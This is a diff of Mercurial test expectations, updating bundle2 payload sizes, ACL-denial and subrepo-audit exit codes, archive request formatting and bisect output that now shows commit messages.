@@ -1112,14 +1117,14 @@
f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd
911600dab2ae7a9baff75958b84fe606851ce955
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 24 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 24 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 24
bundle2-input-part: "check:updated-heads" supported
@@ -1190,14 +1195,14 @@
f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd
911600dab2ae7a9baff75958b84fe606851ce955
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 24 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 24 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 24
bundle2-input-part: "check:updated-heads" supported
@@ -1279,14 +1284,14 @@
f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd
911600dab2ae7a9baff75958b84fe606851ce955
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 24 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 24 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 24
bundle2-input-part: "check:updated-heads" supported
@@ -1369,14 +1374,14 @@
f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd
911600dab2ae7a9baff75958b84fe606851ce955
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 24 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 24 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 24
bundle2-input-part: "check:updated-heads" supported
@@ -1408,6 +1413,7 @@
bundle2-input-part: "phase-heads" supported
bundle2-input-part: total payload size 24
bundle2-input-bundle: 5 parts total
+ truncating cache/rbc-revs-v1 to 8
updating the branch cache
added 3 changesets with 3 changes to 3 files
bundle2-output-bundle: "HG20", 1 parts total
@@ -1455,14 +1461,14 @@
f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd
911600dab2ae7a9baff75958b84fe606851ce955
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 24 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 24 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 24
bundle2-input-part: "check:updated-heads" supported
@@ -1493,6 +1499,7 @@
bundle2-input-bundle: 5 parts total
transaction abort!
rollback completed
+ truncating cache/rbc-revs-v1 to 8
abort: acl: user "fred" denied on "foo/Bar/file.txt" (changeset "f9cafe1212c8")
no rollback information available
0:6675d58eff77
@@ -1537,14 +1544,14 @@
f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd
911600dab2ae7a9baff75958b84fe606851ce955
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 24 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 24 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 24
bundle2-input-part: "check:updated-heads" supported
@@ -1624,14 +1631,14 @@
f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd
911600dab2ae7a9baff75958b84fe606851ce955
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 24 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 24 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 24
bundle2-input-part: "check:updated-heads" supported
@@ -1664,6 +1671,7 @@
bundle2-input-bundle: 5 parts total
transaction abort!
rollback completed
+ truncating cache/rbc-revs-v1 to 8
abort: acl: user "fred" denied on "foo/Bar/file.txt" (changeset "f9cafe1212c8")
no rollback information available
0:6675d58eff77
@@ -1746,14 +1754,14 @@
911600dab2ae7a9baff75958b84fe606851ce955
e8fc755d4d8217ee5b0c2bb41558c40d43b92c01
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 48 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 48 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 48
bundle2-input-part: "check:updated-heads" supported
@@ -1833,14 +1841,14 @@
911600dab2ae7a9baff75958b84fe606851ce955
e8fc755d4d8217ee5b0c2bb41558c40d43b92c01
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 48 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 48 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 48
bundle2-input-part: "check:updated-heads" supported
@@ -1911,14 +1919,14 @@
911600dab2ae7a9baff75958b84fe606851ce955
e8fc755d4d8217ee5b0c2bb41558c40d43b92c01
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 48 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 48 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 48
bundle2-input-part: "check:updated-heads" supported
@@ -1985,14 +1993,14 @@
911600dab2ae7a9baff75958b84fe606851ce955
e8fc755d4d8217ee5b0c2bb41558c40d43b92c01
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 48 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 48 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 48
bundle2-input-part: "check:updated-heads" supported
@@ -2053,14 +2061,14 @@
911600dab2ae7a9baff75958b84fe606851ce955
e8fc755d4d8217ee5b0c2bb41558c40d43b92c01
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 48 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 48 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 48
bundle2-input-part: "check:updated-heads" supported
@@ -2145,14 +2153,14 @@
911600dab2ae7a9baff75958b84fe606851ce955
e8fc755d4d8217ee5b0c2bb41558c40d43b92c01
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 48 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 48 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 48
bundle2-input-part: "check:updated-heads" supported
@@ -2236,14 +2244,14 @@
911600dab2ae7a9baff75958b84fe606851ce955
e8fc755d4d8217ee5b0c2bb41558c40d43b92c01
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 48 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 48 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 48
bundle2-input-part: "check:updated-heads" supported
@@ -2309,14 +2317,14 @@
911600dab2ae7a9baff75958b84fe606851ce955
e8fc755d4d8217ee5b0c2bb41558c40d43b92c01
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 48 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 48 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 48
bundle2-input-part: "check:updated-heads" supported
@@ -2394,14 +2402,14 @@
911600dab2ae7a9baff75958b84fe606851ce955
e8fc755d4d8217ee5b0c2bb41558c40d43b92c01
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 48 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 48 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 48
bundle2-input-part: "check:updated-heads" supported
--- a/tests/test-archive.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-archive.t Tue Apr 20 11:01:06 2021 -0400
@@ -334,10 +334,10 @@
> pass
> if len(sys.argv) <= 3:
> node, archive = sys.argv[1:]
- > requeststr = 'cmd=archive;node=%s;type=%s' % (node, archive)
+ > requeststr = 'cmd=archive&node=%s&type=%s' % (node, archive)
> else:
> node, archive, file = sys.argv[1:]
- > requeststr = 'cmd=archive;node=%s;type=%s;file=%s' % (node, archive, file)
+ > requeststr = 'cmd=archive&node=%s&type=%s&file=%s' % (node, archive, file)
> try:
> stdout = sys.stdout.buffer
> except AttributeError:
--- a/tests/test-audit-subrepo.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-audit-subrepo.t Tue Apr 20 11:01:06 2021 -0400
@@ -323,7 +323,7 @@
new changesets 7a2f0e59146f
.hgsubstate: untracked file differs
abort: untracked files in working directory differ from files in requested revision
- [255]
+ [20]
$ cat main5/.hg/hgrc | grep pwned
[1]
@@ -623,7 +623,7 @@
new changesets * (glob)
.hgsubstate: untracked file differs
abort: untracked files in working directory differ from files in requested revision
- [255]
+ [20]
$ ls "$FAKEHOME"
a
$ test -d "$FAKEHOME/.hg"
@@ -652,7 +652,7 @@
new changesets * (glob)
.hgsubstate: untracked file differs
abort: untracked files in working directory differ from files in requested revision
- [255]
+ [20]
$ ls -A "$FAKEHOME"
.hg
a
--- a/tests/test-backout.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-backout.t Tue Apr 20 11:01:06 2021 -0400
@@ -718,6 +718,7 @@
ancestor path: foo (node f89532f44c247a0e993d63e3a734dd781ab04708)
other path: foo (node f50039b486d6fa1a90ae51778388cad161f425ee)
extra: ancestorlinknode = 91360952243723bd5b1138d5f26bd8c8564cb553
+ extra: merged = yes
$ mv .hg/merge/state2 .hg/merge/state2-moved
$ hg debugmergestate -v
no version 2 merge state
--- a/tests/test-batching.py Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-batching.py Tue Apr 20 11:01:06 2021 -0400
@@ -204,7 +204,7 @@
@wireprotov1peer.batchable
def foo(self, one, two=None):
- encargs = [
+ encoded_args = [
(
b'one',
mangle(one),
@@ -214,9 +214,9 @@
mangle(two),
),
]
- encresref = wireprotov1peer.future()
- yield encargs, encresref
- yield unmangle(encresref.value)
+ encoded_res_future = wireprotov1peer.future()
+ yield encoded_args, encoded_res_future
+ yield unmangle(encoded_res_future.value)
@wireprotov1peer.batchable
def bar(self, b, a):
--- a/tests/test-bisect.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-bisect.t Tue Apr 20 11:01:06 2021 -0400
@@ -200,25 +200,25 @@
update: (current)
phases: 32 draft
$ hg bisect -g 1
- Testing changeset 16:a2e6ea4973e9 (30 changesets remaining, ~4 tests)
+ Testing changeset 16:a2e6ea4973e9 "msg 16" (30 changesets remaining, ~4 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect -g
- Testing changeset 23:5ec79163bff4 (15 changesets remaining, ~3 tests)
+ Testing changeset 23:5ec79163bff4 "msg 23" (15 changesets remaining, ~3 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
skip
$ hg bisect -s
- Testing changeset 24:10e0acd3809e (15 changesets remaining, ~3 tests)
+ Testing changeset 24:10e0acd3809e "msg 24" (15 changesets remaining, ~3 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect -g
- Testing changeset 27:288867a866e9 (7 changesets remaining, ~2 tests)
+ Testing changeset 27:288867a866e9 "msg 27" (7 changesets remaining, ~2 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect -g
- Testing changeset 29:b5bd63375ab9 (4 changesets remaining, ~2 tests)
+ Testing changeset 29:b5bd63375ab9 "msg 29" (4 changesets remaining, ~2 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect -b
- Testing changeset 28:8e0c2264c8af (2 changesets remaining, ~1 tests)
+ Testing changeset 28:8e0c2264c8af "msg 28" (2 changesets remaining, ~1 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect -g
The first bad revision is:
@@ -234,7 +234,7 @@
$ hg bisect -b "0::3"
$ hg bisect -s "13::16"
$ hg bisect -g "26::tip"
- Testing changeset 12:1941b52820a5 (23 changesets remaining, ~4 tests)
+ Testing changeset 12:1941b52820a5 "msg 12" (23 changesets remaining, ~4 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ cat .hg/bisect.state
bad b99c7b9c8e11558adef3fad9af211c58d46f325b
@@ -258,25 +258,25 @@
$ hg bisect -r
$ hg bisect -b null
$ hg bisect -g tip
- Testing changeset 15:e7fa0811edb0 (32 changesets remaining, ~5 tests)
+ Testing changeset 15:e7fa0811edb0 "msg 15" (32 changesets remaining, ~5 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect -g
- Testing changeset 7:03750880c6b5 (16 changesets remaining, ~4 tests)
+ Testing changeset 7:03750880c6b5 "msg 7" (16 changesets remaining, ~4 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
skip
$ hg bisect -s
- Testing changeset 6:a3d5c6fdf0d3 (16 changesets remaining, ~4 tests)
+ Testing changeset 6:a3d5c6fdf0d3 "msg 6" (16 changesets remaining, ~4 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect -g
- Testing changeset 2:db07c04beaca (7 changesets remaining, ~2 tests)
+ Testing changeset 2:db07c04beaca "msg 2" (7 changesets remaining, ~2 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect -g
- Testing changeset 0:b99c7b9c8e11 (3 changesets remaining, ~1 tests)
+ Testing changeset 0:b99c7b9c8e11 "msg 0" (3 changesets remaining, ~1 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect -b
- Testing changeset 1:5cd978ea5149 (2 changesets remaining, ~1 tests)
+ Testing changeset 1:5cd978ea5149 "msg 1" (2 changesets remaining, ~1 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect -g
The first good revision is:
@@ -295,7 +295,7 @@
$ hg bisect -r
$ hg bisect -g null
$ hg bisect -bU tip
- Testing changeset 15:e7fa0811edb0 (32 changesets remaining, ~5 tests)
+ Testing changeset 15:e7fa0811edb0 "msg 15" (32 changesets remaining, ~5 tests)
$ hg id
5cd978ea5149
@@ -306,13 +306,13 @@
$ hg bisect -r
$ hg bisect -b 4
$ hg bisect -g 0
- Testing changeset 2:db07c04beaca (4 changesets remaining, ~2 tests)
+ Testing changeset 2:db07c04beaca "msg 2" (4 changesets remaining, ~2 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect -s
- Testing changeset 1:5cd978ea5149 (4 changesets remaining, ~2 tests)
+ Testing changeset 1:5cd978ea5149 "msg 1" (4 changesets remaining, ~2 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect -s
- Testing changeset 3:b53bea5e2fcb (4 changesets remaining, ~2 tests)
+ Testing changeset 3:b53bea5e2fcb "msg 3" (4 changesets remaining, ~2 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect -s
Due to skipped revisions, the first bad revision could be any of:
@@ -343,7 +343,7 @@
$ hg bisect -r
$ hg bisect -g 0
$ hg bisect -b 2
- Testing changeset 1:5cd978ea5149 (2 changesets remaining, ~1 tests)
+ Testing changeset 1:5cd978ea5149 "msg 1" (2 changesets remaining, ~1 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect -s
Due to skipped revisions, the first bad revision could be any of:
@@ -372,19 +372,19 @@
$ hg bisect -r
$ hg bisect -b 6
$ hg bisect -g 0
- Testing changeset 3:b53bea5e2fcb (6 changesets remaining, ~2 tests)
+ Testing changeset 3:b53bea5e2fcb "msg 3" (6 changesets remaining, ~2 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect -s
- Testing changeset 2:db07c04beaca (6 changesets remaining, ~2 tests)
+ Testing changeset 2:db07c04beaca "msg 2" (6 changesets remaining, ~2 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect -s
- Testing changeset 4:9b2ba8336a65 (6 changesets remaining, ~2 tests)
+ Testing changeset 4:9b2ba8336a65 "msg 4" (6 changesets remaining, ~2 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect -s
- Testing changeset 1:5cd978ea5149 (6 changesets remaining, ~2 tests)
+ Testing changeset 1:5cd978ea5149 "msg 1" (6 changesets remaining, ~2 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect -s
- Testing changeset 5:7874a09ea728 (6 changesets remaining, ~2 tests)
+ Testing changeset 5:7874a09ea728 "msg 5" (6 changesets remaining, ~2 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect -g
The first bad revision is:
@@ -473,17 +473,17 @@
$ hg bisect -r
$ hg up -qr tip
$ hg bisect --command "\"$PYTHON\" \"$TESTTMP/script.py\" and some parameters"
- changeset 31:58c80a7c8a40: good
+ changeset 31:58c80a7c8a40 tip "msg 31": good
abort: cannot bisect (no known bad revisions)
[20]
$ hg up -qr 0
$ hg bisect --command "\"$PYTHON\" \"$TESTTMP/script.py\" and some parameters"
- changeset 0:b99c7b9c8e11: bad
- changeset 15:e7fa0811edb0: good
- changeset 7:03750880c6b5: good
- changeset 3:b53bea5e2fcb: bad
- changeset 5:7874a09ea728: bad
- changeset 6:a3d5c6fdf0d3: good
+ changeset 0:b99c7b9c8e11 "msg 0": bad
+ changeset 15:e7fa0811edb0 "msg 15": good
+ changeset 7:03750880c6b5 "msg 7": good
+ changeset 3:b53bea5e2fcb "msg 3": bad
+ changeset 5:7874a09ea728 "msg 5": bad
+ changeset 6:a3d5c6fdf0d3 "msg 6": good
The first good revision is:
changeset: 6:a3d5c6fdf0d3
user: test
@@ -510,13 +510,13 @@
$ hg bisect -r
$ hg bisect --good tip --noupdate
$ hg bisect --bad 0 --noupdate
- Testing changeset 15:e7fa0811edb0 (31 changesets remaining, ~4 tests)
+ Testing changeset 15:e7fa0811edb0 "msg 15" (31 changesets remaining, ~4 tests)
$ hg bisect --command "sh \"$TESTTMP/script.sh\" and some params" --noupdate
- changeset 15:e7fa0811edb0: good
- changeset 7:03750880c6b5: good
- changeset 3:b53bea5e2fcb: bad
- changeset 5:7874a09ea728: bad
- changeset 6:a3d5c6fdf0d3: good
+ changeset 15:e7fa0811edb0 "msg 15": good
+ changeset 7:03750880c6b5 "msg 7": good
+ changeset 3:b53bea5e2fcb "msg 3": bad
+ changeset 5:7874a09ea728 "msg 5": bad
+ changeset 6:a3d5c6fdf0d3 "msg 6": good
The first good revision is:
changeset: 6:a3d5c6fdf0d3
user: test
@@ -543,17 +543,17 @@
$ hg bisect -r
$ hg up -qr tip
$ hg bisect --command "sh \"$TESTTMP/script.sh\" and some params"
- changeset 31:58c80a7c8a40: good
+ changeset 31:58c80a7c8a40 tip "msg 31": good
abort: cannot bisect (no known bad revisions)
[20]
$ hg up -qr 0
$ hg bisect --command "sh \"$TESTTMP/script.sh\" and some params"
- changeset 0:b99c7b9c8e11: bad
- changeset 15:e7fa0811edb0: good
- changeset 7:03750880c6b5: good
- changeset 3:b53bea5e2fcb: bad
- changeset 5:7874a09ea728: bad
- changeset 6:a3d5c6fdf0d3: good
+ changeset 0:b99c7b9c8e11 "msg 0": bad
+ changeset 15:e7fa0811edb0 "msg 15": good
+ changeset 7:03750880c6b5 "msg 7": good
+ changeset 3:b53bea5e2fcb "msg 3": bad
+ changeset 5:7874a09ea728 "msg 5": bad
+ changeset 6:a3d5c6fdf0d3 "msg 6": good
The first good revision is:
changeset: 6:a3d5c6fdf0d3
user: test
@@ -586,13 +586,13 @@
$ hg bisect --reset
$ hg bisect --good 15
$ hg bisect --bad 30
- Testing changeset 22:06c7993750ce (15 changesets remaining, ~3 tests)
+ Testing changeset 22:06c7993750ce "msg 22" (15 changesets remaining, ~3 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect --command true
- changeset 22:06c7993750ce: good
- changeset 26:3efc6fd51aeb: good
- changeset 28:8e0c2264c8af: good
- changeset 29:b5bd63375ab9: good
+ changeset 22:06c7993750ce "msg 22": good
+ changeset 26:3efc6fd51aeb "msg 26": good
+ changeset 28:8e0c2264c8af "msg 28": good
+ changeset 29:b5bd63375ab9 "msg 29": good
The first bad revision is:
changeset: 30:ed2d2f24b11c
tag: tip
@@ -735,11 +735,11 @@
$ hg bisect --reset
$ hg bisect --good .
$ hg bisect --bad 25
- Testing changeset 28:8e0c2264c8af (6 changesets remaining, ~2 tests)
+ Testing changeset 28:8e0c2264c8af "msg 28" (6 changesets remaining, ~2 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect --command true
- changeset 28:8e0c2264c8af: good
- changeset 26:3efc6fd51aeb: good
+ changeset 28:8e0c2264c8af "msg 28": good
+ changeset 26:3efc6fd51aeb "msg 26": good
The first good revision is:
changeset: 26:3efc6fd51aeb
user: test
--- a/tests/test-bisect2.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-bisect2.t Tue Apr 20 11:01:06 2021 -0400
@@ -252,7 +252,7 @@
$ hg bisect -r
$ hg bisect -g 0
$ hg bisect -b 17 # -> update to rev 6
- Testing changeset 6:a214d5d3811a (15 changesets remaining, ~3 tests)
+ Testing changeset 6:a214d5d3811a "merge 4,5" (15 changesets remaining, ~3 tests)
0 files updated, 0 files merged, 2 files removed, 0 files unresolved
$ hg log -q -r 'bisect(pruned)'
0:33b1f9bc8bc5
@@ -274,16 +274,16 @@
16:609d82a7ebae
$ hg log -q -r 'bisect(ignored)'
$ hg bisect -g # -> update to rev 13
- Testing changeset 13:b0a32c86eb31 (9 changesets remaining, ~3 tests)
+ Testing changeset 13:b0a32c86eb31 "13" (9 changesets remaining, ~3 tests)
3 files updated, 0 files merged, 1 files removed, 0 files unresolved
$ hg bisect -s # -> update to rev 10
- Testing changeset 10:429fcd26f52d (9 changesets remaining, ~3 tests)
+ Testing changeset 10:429fcd26f52d "merge 6,9" (9 changesets remaining, ~3 tests)
3 files updated, 0 files merged, 1 files removed, 0 files unresolved
$ hg bisect -b # -> update to rev 8
- Testing changeset 8:dab8161ac8fc (3 changesets remaining, ~1 tests)
+ Testing changeset 8:dab8161ac8fc "8" (3 changesets remaining, ~1 tests)
2 files updated, 0 files merged, 1 files removed, 0 files unresolved
$ hg bisect -g # -> update to rev 9
- Testing changeset 9:3c77083deb4a (2 changesets remaining, ~1 tests)
+ Testing changeset 9:3c77083deb4a "9" (2 changesets remaining, ~1 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect -b
The first bad revision is:
@@ -350,10 +350,10 @@
$ hg bisect -r
$ hg bisect -g 18
$ hg bisect -b 1 # -> update to rev 6
- Testing changeset 6:a214d5d3811a (13 changesets remaining, ~3 tests)
+ Testing changeset 6:a214d5d3811a "merge 4,5" (13 changesets remaining, ~3 tests)
2 files updated, 0 files merged, 1 files removed, 0 files unresolved
$ hg bisect -s # -> update to rev 10
- Testing changeset 10:429fcd26f52d (13 changesets remaining, ~3 tests)
+ Testing changeset 10:429fcd26f52d "merge 6,9" (13 changesets remaining, ~3 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg log -q -r 'bisect(pruned)'
0:33b1f9bc8bc5
@@ -361,7 +361,7 @@
6:a214d5d3811a
18:d42e18c7bc9b
$ hg bisect -b # -> update to rev 12
- Testing changeset 12:9f259202bbe7 (5 changesets remaining, ~2 tests)
+ Testing changeset 12:9f259202bbe7 "12" (5 changesets remaining, ~2 tests)
3 files updated, 0 files merged, 1 files removed, 0 files unresolved
$ hg log -q -r 'bisect(pruned)'
0:33b1f9bc8bc5
@@ -381,7 +381,7 @@
13:b0a32c86eb31
15:857b178a7cf3
$ hg bisect -b # -> update to rev 13
- Testing changeset 13:b0a32c86eb31 (3 changesets remaining, ~1 tests)
+ Testing changeset 13:b0a32c86eb31 "13" (3 changesets remaining, ~1 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect -g
The first good revision is:
@@ -414,7 +414,7 @@
$ hg bisect -r
$ hg bisect -g 1
$ hg bisect -b 16 # -> update to rev 6
- Testing changeset 6:a214d5d3811a (13 changesets remaining, ~3 tests)
+ Testing changeset 6:a214d5d3811a "merge 4,5" (13 changesets remaining, ~3 tests)
2 files updated, 0 files merged, 2 files removed, 0 files unresolved
$ hg log -q -r 'bisect(pruned)'
0:33b1f9bc8bc5
@@ -422,13 +422,13 @@
16:609d82a7ebae
17:228c06deef46
$ hg bisect -g # -> update to rev 13
- Testing changeset 13:b0a32c86eb31 (8 changesets remaining, ~3 tests)
